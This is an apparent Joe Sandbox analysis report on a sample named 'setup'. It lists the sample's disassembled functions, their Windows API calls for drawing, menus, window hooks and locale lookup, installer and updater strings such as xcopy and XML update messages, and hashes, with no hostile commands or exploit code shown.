                                                                                                                          • SelectObject.GDI32(?,?), ref: 00C0E87A
                                                                                                                          • DeleteObject.GDI32(?), ref: 00C0E884
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LineMoveObject$Select$CreateDelete
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 610386545-0
                                                                                                                          • Opcode ID: a624981de2353ec3ff8f900ebeeefb203989f94b6295571394c244e8e0230d1d
                                                                                                                          • Instruction ID: b9f1ebff54a18f8b023dd533a903b27042d4040129826faed351840d91371a0d
                                                                                                                          • Opcode Fuzzy Hash: a624981de2353ec3ff8f900ebeeefb203989f94b6295571394c244e8e0230d1d
                                                                                                                          • Instruction Fuzzy Hash: D6D13B719187419FC706CF34C894A5ABBE5BFDE394F108B1EF586A2261E331D892DB42
                                                                                                                          Function 00C0E03D Relevance: 30.3, APIs: 20, Instructions: 304COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreatePen.GDI32(00000000,00000001,?), ref: 00C0E272
                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00C0E281
                                                                                                                          • MoveToEx.GDI32(?,?,?,00000000), ref: 00C0E299
                                                                                                                          • LineTo.GDI32(?,?,?), ref: 00C0E2AB
                                                                                                                          • MoveToEx.GDI32(?,?,?,00000000), ref: 00C0E2BF
                                                                                                                          • LineTo.GDI32(?,?,?), ref: 00C0E2D1
                                                                                                                          • MoveToEx.GDI32(00000000,?,?,00000000), ref: 00C0E2F3
                                                                                                                          • LineTo.GDI32(00000000,?,?), ref: 00C0E302
                                                                                                                          • SelectObject.GDI32(?,?), ref: 00C0E321
                                                                                                                          • DeleteObject.GDI32(?), ref: 00C0E32B
                                                                                                                          • CreatePen.GDI32(00000000,00000001,?), ref: 00C0E37A
                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00C0E389
                                                                                                                          • MoveToEx.GDI32(?,?,?,00000000), ref: 00C0E3A1
                                                                                                                          • LineTo.GDI32(?,?,?), ref: 00C0E3B3
                                                                                                                          • MoveToEx.GDI32(?,?,?,00000000), ref: 00C0E3C7
                                                                                                                          • LineTo.GDI32(?,?,?), ref: 00C0E3DB
                                                                                                                          • MoveToEx.GDI32(00000000,?,?,00000000), ref: 00C0E400
                                                                                                                          • LineTo.GDI32(00000000,?,?), ref: 00C0E40C
                                                                                                                          • SelectObject.GDI32(?,?), ref: 00C0E42B
                                                                                                                          • DeleteObject.GDI32(?), ref: 00C0E435
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LineMoveObject$Select$CreateDelete
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 610386545-0
                                                                                                                          • Opcode ID: a3dc34e0e9c50ca2938fcf32a15279cce44c8a0c8b822953b44d3311bb493aaf
                                                                                                                          • Instruction ID: 7ecac23f46158bdc18a93b639f535c3b38ef7149bcc4f5b3d0da75db0003f163
                                                                                                                          • Opcode Fuzzy Hash: a3dc34e0e9c50ca2938fcf32a15279cce44c8a0c8b822953b44d3311bb493aaf
                                                                                                                          • Instruction Fuzzy Hash: 88C13B719187419FC706CF34D954A2ABBE5BFDE354F108B2EF585A2261E331D852DB02
                                                                                                                          Function 00C2FC64 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 179windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C351FB: GetWindowLongW.USER32(0000001C,000000F0), ref: 00C35208
                                                                                                                          • GetParent.USER32(0000001C), ref: 00C2FCA5
                                                                                                                          • SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 00C2FCC7
                                                                                                                          • GetWindowRect.USER32(0000001C,?), ref: 00C2FCEB
                                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00C2FD0B
                                                                                                                          • MonitorFromWindow.USER32(00000000,00000001), ref: 00C2FD44
                                                                                                                          • GetMonitorInfoW.USER32(00000000), ref: 00C2FD4B
                                                                                                                          • CopyRect.USER32(?,?), ref: 00C2FD59
                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00C2FD66
                                                                                                                          • MonitorFromWindow.USER32(00000000,00000002), ref: 00C2FD73
                                                                                                                          • GetMonitorInfoW.USER32(00000000), ref: 00C2FD7A
                                                                                                                          • CopyRect.USER32(?,?), ref: 00C2FD88
                                                                                                                          • GetParent.USER32(0000001C), ref: 00C2FD92
                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00C2FD9F
                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00C2FDAA
                                                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00C2FDB8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Rect$Monitor$ClientCopyFromInfoLongParent$MessagePointsSend
                                                                                                                          • String ID: (
                                                                                                                          • API String ID: 3610148278-3887548279
                                                                                                                          • Opcode ID: 841b07baea546efec747f78c7dcf56006d2d8d0601defab8182069eee5ec5da1
                                                                                                                          • Instruction ID: 618a3a30934944e4b3c01ac001209655ae966169d83a2f259d09239357a89ca5
                                                                                                                          • Opcode Fuzzy Hash: 841b07baea546efec747f78c7dcf56006d2d8d0601defab8182069eee5ec5da1
                                                                                                                          • Instruction Fuzzy Hash: 56613E7290021DAFCB11DFA8DD88BEEB7B9FF48304F154229E515A7195DB30AE468B60
                                                                                                                          Function 00C20ACF Relevance: 27.3, APIs: 18, Instructions: 303windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C20AD6
                                                                                                                            • Part of subcall function 00C351FB: GetWindowLongW.USER32(0000001C,000000F0), ref: 00C35208
                                                                                                                          • OffsetRect.USER32(?,?,?), ref: 00C20B4E
                                                                                                                            • Part of subcall function 00C2D092: __EH_prolog3.LIBCMT ref: 00C2D099
                                                                                                                            • Part of subcall function 00C2D092: GetWindowDC.USER32(00000000,00000004,00000000,?,00000058,00C1C274), ref: 00C2D0C5
                                                                                                                          • CreateCompatibleDC.GDI32(?), ref: 00C20B70
                                                                                                                            • Part of subcall function 00C2D6D6: SaveDC.GDI32(?), ref: 00C2D6E4
                                                                                                                            • Part of subcall function 00C2D6D6: SaveDC.GDI32(?), ref: 00C2D6F5
                                                                                                                          • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00C20BAF
                                                                                                                            • Part of subcall function 00C2D7E9: SelectObject.GDI32(?,?), ref: 00C2D7F2
                                                                                                                          • GetSysColor.USER32(0000000F), ref: 00C20BCB
                                                                                                                            • Part of subcall function 00C2CF46: __EH_prolog3.LIBCMT ref: 00C2CF4D
                                                                                                                            • Part of subcall function 00C2CF46: CreateSolidBrush.GDI32(?), ref: 00C2CF68
                                                                                                                          • GetBrushOrgEx.GDI32(?,?,00000000), ref: 00C20BE5
                                                                                                                          • SetBrushOrgEx.GDI32(?,00000008,00000008,?), ref: 00C20C26
                                                                                                                          • FillRect.USER32(?,?,?), ref: 00C20C42
                                                                                                                          • GetSysColor.USER32(00000010), ref: 00C20C57
                                                                                                                          • Rectangle.GDI32(?,?,?,?,?), ref: 00C20C87
                                                                                                                          • GetSysColor.USER32(00000012), ref: 00C20CA2
                                                                                                                          • GetSysColor.USER32(00000005), ref: 00C20CDE
                                                                                                                            • Part of subcall function 00C2D048: __EH_prolog3.LIBCMT ref: 00C2D04F
                                                                                                                            • Part of subcall function 00C2D048: CreatePen.GDI32(?,?,?), ref: 00C2D070
                                                                                                                            • Part of subcall function 00C2D802: SelectObject.GDI32(?,00000000), ref: 00C2D822
                                                                                                                            • Part of subcall function 00C2D802: SelectObject.GDI32(?,00000000), ref: 00C2D838
                                                                                                                          • Rectangle.GDI32(?,?,?,?,?), ref: 00C20D29
                                                                                                                          • DrawEdge.USER32(?,?,00000005,0000000F), ref: 00C20D62
                                                                                                                          • GetSysColor.USER32(00000014), ref: 00C20D79
                                                                                                                          • GetSysColor.USER32(00000010), ref: 00C20D8B
                                                                                                                          • GetSysColor.USER32(00000012), ref: 00C20D96
                                                                                                                          • BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00CC0020), ref: 00C20E1A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Color$Create$BrushH_prolog3ObjectSelect$CompatibleRectRectangleSaveWindow$BitmapDrawEdgeFillH_prolog3_LongOffsetSolid
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 399950698-0
                                                                                                                          • Opcode ID: dadf59e67ef99a0352eb606548a8b5bcf3391f5f1a8f4bb88f7970c8292c9681
                                                                                                                          • Instruction ID: 0df5cf47e6499e133e722878f07e3cccbe00a2e2d246af01f7c15fd026617805
                                                                                                                          • Opcode Fuzzy Hash: dadf59e67ef99a0352eb606548a8b5bcf3391f5f1a8f4bb88f7970c8292c9681
                                                                                                                          • Instruction Fuzzy Hash: 44C13771A00219AFDF19DBA4EC9AFEDBBB9FF14300F104119F502A71A1DB716A45EB60
                                                                                                                          Function 00C1CDF5 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 384COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: H_prolog3_
                                                                                                                          • String ID: /beta$/debug$/stable$32bit$64bit$XML Parse Error.. aborting...$XML Parse error. did not find version info in xml file.$full$minversion$platform$update$updates/$url$version
                                                                                                                          • API String ID: 2427045233-3910716457
                                                                                                                          • Opcode ID: ba5b34942d10143e966757c7548f06c4a8c64297fab444ced1a45c5752adbbe9
                                                                                                                          • Instruction ID: c44fd39aaa866b9a13462a5c57a4d53d4693fc03249509c92de2494fdef4a86d
                                                                                                                          • Opcode Fuzzy Hash: ba5b34942d10143e966757c7548f06c4a8c64297fab444ced1a45c5752adbbe9
                                                                                                                          • Instruction Fuzzy Hash: 31F15F71D002A8DEEF24DBA4C855BEDB7B8BF15300F5481A9E40AA7191DB306F86EF51
                                                                                                                          Function 00C330D0 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 154COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C330DA
                                                                                                                            • Part of subcall function 00C3E462: __EH_prolog3.LIBCMT ref: 00C3E47F
                                                                                                                          • CallNextHookEx.USER32(?,?,?,?), ref: 00C33112
                                                                                                                          • SetWindowLongW.USER32(?,000000FC,00C2F2FC), ref: 00C331B6
                                                                                                                          • CallNextHookEx.USER32(?,00000003,?,?), ref: 00C332C6
                                                                                                                          • UnhookWindowsHookEx.USER32(?), ref: 00C332DA
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Hook$CallNext$H_prolog3H_prolog3_LongUnhookWindowWindows
                                                                                                                          • String ID: #32768$AfxOldWndProc423
                                                                                                                          • API String ID: 1591070667-2141921550
                                                                                                                          • Opcode ID: c57f2455513a966b32b4c4379c827613152f58e7112265d38a1a32197b0eecb0
                                                                                                                          • Instruction ID: 7d4f244ea4afaa462b5761b2899c0b7e7b8ca2cdee3c4c4b96bb6888a27a7320
                                                                                                                          • Opcode Fuzzy Hash: c57f2455513a966b32b4c4379c827613152f58e7112265d38a1a32197b0eecb0
                                                                                                                          • Instruction Fuzzy Hash: E951DE31950265ABCF21AF60DC4DBAF7B74AF19710F110199F815AB2E2CB319F41DBA0
                                                                                                                          Function 00C12CDE Relevance: 25.8, APIs: 17, Instructions: 345windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C12CE5
                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00C12D0C
                                                                                                                          • CreatePopupMenu.USER32 ref: 00C12D52
                                                                                                                          • AppendMenuW.USER32(?,00000000,00000001,00000000), ref: 00C12DB5
                                                                                                                          • AppendMenuW.USER32(?,00000000,00000002,00000000), ref: 00C12DCB
                                                                                                                          • AppendMenuW.USER32(?,00000800,00000000,00CAE150), ref: 00C12DDC
                                                                                                                          • AppendMenuW.USER32(?,00000000,00000005,00000000), ref: 00C12E0F
                                                                                                                          • AppendMenuW.USER32(?,00000000,00000003,00000000), ref: 00C12E67
                                                                                                                          • AppendMenuW.USER32(?,00000800,00000000,00CAE150), ref: 00C12E9D
                                                                                                                          • AppendMenuW.USER32(?,00000000,0000000A,00000000), ref: 00C12EB8
                                                                                                                            • Part of subcall function 00C12B7E: CreatePopupMenu.USER32 ref: 00C12BA7
                                                                                                                            • Part of subcall function 00C12B7E: _strlen.LIBCMT ref: 00C12BD6
                                                                                                                            • Part of subcall function 00C12B7E: AppendMenuW.USER32(?,00000000,00000096,00000000), ref: 00C12C0D
                                                                                                                            • Part of subcall function 00C12B7E: AppendMenuW.USER32(?,00000010,?,00000000), ref: 00C12C33
                                                                                                                          • AppendMenuW.USER32(?,00000000,0000000F,00000000), ref: 00C12ED3
                                                                                                                            • Part of subcall function 00C11F0F: InvalidateRect.USER32(?,00000000,00000001,?,?,?,?,?,?,?,00C10B06,?,?,?,?), ref: 00C11F3C
                                                                                                                          • AppendMenuW.USER32(?,00000800,00000000,00CAE150), ref: 00C12EEF
                                                                                                                          • AppendMenuW.USER32(?,00000000,00000014,00000000), ref: 00C12F04
                                                                                                                          • AppendMenuW.USER32(?,00000000,00000015,00000000), ref: 00C12F19
                                                                                                                          • AppendMenuW.USER32(?,00000800,00000000,00CAE150), ref: 00C12F2F
                                                                                                                          • AppendMenuW.USER32(?,?,0000005A,00000000), ref: 00C12F50
                                                                                                                          • AppendMenuW.USER32(?,00000000,00000064,00000000), ref: 00C12F67
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Menu$Append$CreatePopup$ClientH_prolog3_InvalidateRectScreen_strlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 502655507-0
                                                                                                                          • Opcode ID: 3d88b9f48150ed0a18136f394b150d7cd2182e97701ba528e2bc8ed561d21daa
                                                                                                                          • Instruction ID: a342e1db3c4f2b1fb578c4fccd0be4ec6aa98159ecb0722a51d1bf67710071a8
                                                                                                                          • Opcode Fuzzy Hash: 3d88b9f48150ed0a18136f394b150d7cd2182e97701ba528e2bc8ed561d21daa
                                                                                                                          • Instruction Fuzzy Hash: 36C19E31A00218AFDF149FA4CC99FED7BB5FF4A705F0400A8F905AB2A5CA719E45EB51
                                                                                                                          Function 00C17368 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 245COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C1736F
                                                                                                                            • Part of subcall function 00C189E2: _strlen.LIBCMT ref: 00C189EB
                                                                                                                          • _strlen.LIBCMT ref: 00C173E2
                                                                                                                          • _strlen.LIBCMT ref: 00C17428
                                                                                                                          • _strlen.LIBCMT ref: 00C174A9
                                                                                                                          • _strlen.LIBCMT ref: 00C174EF
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,0000005C,00C17084,?), ref: 00C17536
                                                                                                                          • _strlen.LIBCMT ref: 00C17561
                                                                                                                            • Part of subcall function 00C03869: MultiByteToWideChar.KERNEL32(?,00000000,00000000,000000FF,?,?), ref: 00C0388C
                                                                                                                          • _strlen.LIBCMT ref: 00C175AE
                                                                                                                          Strings
                                                                                                                          • DO_NOT_REPLACE, xrefs: 00C173B0
                                                                                                                          • Failed to replace files in %s due to Sharing violation..., xrefs: 00C1758E
                                                                                                                          • Failed to xcopy files. Invalid parameters, xrefs: 00C17605
                                                                                                                          • XCopy: "%s" --> "%s", xrefs: 00C17475
                                                                                                                          • Failed to replace a file in %s due to error %d..., xrefs: 00C175DE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _strlen$ByteCharErrorH_prolog3_LastMultiWide
                                                                                                                          • String ID: DO_NOT_REPLACE$Failed to replace a file in %s due to error %d...$Failed to replace files in %s due to Sharing violation...$Failed to xcopy files. Invalid parameters$XCopy: "%s" --> "%s"
                                                                                                                          • API String ID: 2242062638-2925842352
                                                                                                                          • Opcode ID: 5c19594c09da95a39c614f675b614539e22fde3aa0448480a646e1af92d50085
                                                                                                                          • Instruction ID: 51769a17d7af7d759b73e1a52055bc1b8a39396f4dcdef5637e3d14a36b11ba1
                                                                                                                          • Opcode Fuzzy Hash: 5c19594c09da95a39c614f675b614539e22fde3aa0448480a646e1af92d50085
                                                                                                                          • Instruction Fuzzy Hash: 0391A371E04208EBDF11EBE5C8459DE7B7ABF06310F144225F415AB291DB319E89FB90
                                                                                                                          Function 00C407F5 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 172libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,?,00000108,00C3996C,?,?), ref: 00C40828
                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThreadPreferredUILanguages), ref: 00C40838
                                                                                                                          • EncodePointer.KERNEL32(00000000,?,?,?,00000108,00C3996C,?,?), ref: 00C40841
                                                                                                                          • DecodePointer.KERNEL32(00000000,?,?,?,?,?,00000108,00C3996C,?,?), ref: 00C4084F
                                                                                                                          • GetUserDefaultUILanguage.KERNEL32(?,?,?,00000108,00C3996C,?,?), ref: 00C40876
                                                                                                                          • ___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 00C40886
                                                                                                                          • ___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 00C408BA
                                                                                                                          • GetSystemDefaultUILanguage.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C408ED
                                                                                                                          • ___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 00C408FD
                                                                                                                          • ___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 00C4093A
                                                                                                                          • ___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 00C40975
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DownlevelLocaleName___crt$DefaultLanguagePointer$AddressDecodeEncodeHandleModuleProcSystemUser
                                                                                                                          • String ID: GetThreadPreferredUILanguages$kernel32.dll
                                                                                                                          • API String ID: 404278886-1646127487
                                                                                                                          • Opcode ID: bc28a09f7dfbb114bc732ee339a8bc4f5a7d59eb5b38da02bfeeee06408e53cd
                                                                                                                          • Instruction ID: 5d8ab7a1a5ce0fe12cbaf432559d108674caa97809466cd1c2bb91da78490387
                                                                                                                          • Opcode Fuzzy Hash: bc28a09f7dfbb114bc732ee339a8bc4f5a7d59eb5b38da02bfeeee06408e53cd
                                                                                                                          • Instruction Fuzzy Hash: 99513C75D0021AAFCB14DFA8CD89EAEB7B9FF48314F104125F615E7251DB34AA09CBA1
                                                                                                                          Function 00C018BB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 236COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C018C5
                                                                                                                          • SetLastError.KERNEL32(0000007E,?,00000C84,00C018A6,POST,?,?,00000034,00C01613,?,?), ref: 00C0191B
                                                                                                                          • SetLastError.KERNEL32(0000007E), ref: 00C019CD
                                                                                                                          • GetLastError.KERNEL32 ref: 00C019E7
                                                                                                                          • SetLastError.KERNEL32(0000007E), ref: 00C01A1F
                                                                                                                          • SetLastError.KERNEL32(0000007E), ref: 00C01A76
                                                                                                                          • GetLastError.KERNEL32 ref: 00C01AA1
                                                                                                                          • SetLastError.KERNEL32(0000007E), ref: 00C01AE8
                                                                                                                          • SetLastError.KERNEL32(0000007E,00000000,00000000,00000000), ref: 00C01B3D
                                                                                                                          • GetLastError.KERNEL32 ref: 00C01B56
                                                                                                                            • Part of subcall function 00C01C9C: SetLastError.KERNEL32(0000007E,?,?,?,?,?,?,?,00C01902,?,00000C84,00C018A6,POST,?,?,00000034), ref: 00C01CC3
                                                                                                                            • Part of subcall function 00C01C9C: GetLastError.KERNEL32(?,?,?,?,?,?,?,00C01902,?,00000C84,00C018A6,POST,?,?,00000034,00C01613), ref: 00C01CDC
                                                                                                                          • SetLastError.KERNEL32(0000007E), ref: 00C01BB7
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
